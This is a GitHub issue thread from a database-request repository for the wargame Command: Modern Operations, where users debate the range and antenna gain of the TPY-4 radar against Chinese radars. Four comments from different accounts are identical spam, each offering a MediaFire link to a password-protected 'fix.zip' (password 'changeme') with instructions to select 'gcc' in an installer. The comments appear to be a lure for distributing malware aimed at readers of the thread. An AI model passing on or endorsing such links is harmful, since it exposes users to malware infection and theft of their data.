### ISSUE TITLE
Update: TPY-4

### ISSUE THREAD

**Issue by RickDNiu** [PygmalionOfCyprus/cmo-db-requests#4966]
> In my original entry, I had this idea that a long-range search radar would be limited by a hard range gate. That at 60kft LOS is about 340nmi. Not anymore. 
> The original Lockheed Martin provided range is clearly the maximum range against a certain adversarial target, namely J-20. 

At 500kw, 1GHz, 50dBi sensitivity, a 2020s radar has 300nmi range for a 0.02sqm target. For 1sqm, 790nmi; for 2sqm, 930nmi; for 4sqm, 1100nmi.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HunterDNiu** [comment]
What's happening? @PygmalionOfCyprus

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RickDNiu** [comment]
Can't see you guys...

**Comment by sr71xx** [comment]
> > In my original entry, I had this idea that a long-range search radar would be limited by a hard range gate. That at 60kft LOS is about 340nmi. Not anymore.
> > The original Lockheed Martin provided range is clearly the maximum range against a certain adversarial target, namely J-20.
> 
> At 500kw, 1GHz, 50dBi sensitivity, a 2020s radar has 300nmi range for a 0.02sqm target. For 1sqm, 790nmi; for 2sqm, 930nmi; for 4sqm, 1100nmi.

Is this range figure cited against ballistic targets, aerodynamic targets, or both? 0.02m2 at 300nmi is very impressive for air breathing targets. The circular T/R modules look very identical to those of the JY-26 and the new SLC-18.

**Comment by Luigi-II** [comment]
> Is this range figure cited against ballistic targets, aerodynamic targets, or both? 0.02m2 at 300nmi is very impressive for air breathing targets. The circular T/R modules look very identical to those of the JY-26 and the new SLC-18.

Obviously, this figure can only be for ballistic missile targets, and due to LOS limitation, monitoring typical atmospheric targets from the ground is obviously not possible at such great distances (Unless OTH).

At the same time, as I mentioned before, what kind of targets can a radar detect? How many targets are monitored? At what distance can it be monitored? It's not just about power, frequency and gain/loss. This is also related to the processing of radar waves (waveform, pulse, back-end processing, standing wave time, etc.). For example, we often hear that "China's XXX radar can detect stealth aircraft at hundreds of kilometers," but we never hear about its anti-BM capability at thousands of kilometers (or simply because we don't know?).

According to the currently known OSINT, TPY-4's ability to monitor ballistic missile targets does not exceed 1000km (the same as one of the TPY-2 sensors in the game), which may take into account the "different battlefield environment requirements" and make a "trade-off" in performance.
https://www.everythingrf.com/products/radar-systems/lockheed-martin/1069-1512-tpy-4

In addition, I noticed that you requested a "50dB" gain, even the most advanced LPI radar in the game only has a 45dB gain. I once asked for only a gain of 15dB on a "hypothetical" radar. Does this conflict too much with the "normal level high power radar" of this game? If you have hard evidence, you're welcome to show it.

**Comment by Luigi-II** [comment]
When I tried to make a horizontal comparison in my areas of expertise, I did find the phrase of "50+dB". However, this is for the "clutter improvement factor", not the "radar antenna gain". Also, this is a Chinese, NOT THEIR MOST ADVANCED, EXPORT, NOT SELF-USED, radar.
https://en.wikipedia.org/wiki/SLC-2_Radar#Type_373_radar
![image](https://github.com/user-attachments/assets/db786990-5498-4f8c-82dc-1e3c57770026)
Interestingly, whether SLC-2 or SLC-7, they are both GaN radars and already have users (Bangladesh or Pakistan). The tech of these things matured and entered service much earlier than TPY-4.
https://www.sinodefenceforum.com/t/chinese-radar-developments-klj-series-and-others.6755/page-56
![image](https://github.com/user-attachments/assets/9c41e8b3-67e0-4d83-bd65-8a9186383100)
![image](https://github.com/user-attachments/assets/25c917df-1a29-43fb-b8b7-50149815210b)

**Comment by Luigi-II** [comment]
Although we have seen many unofficial "propoganda accounts" boasting about how advanced Chinese products are. This time, however, CETC itself calls the SLC-7 "the most advanced L-band Phased-array MFR in the world." It's very interesting...
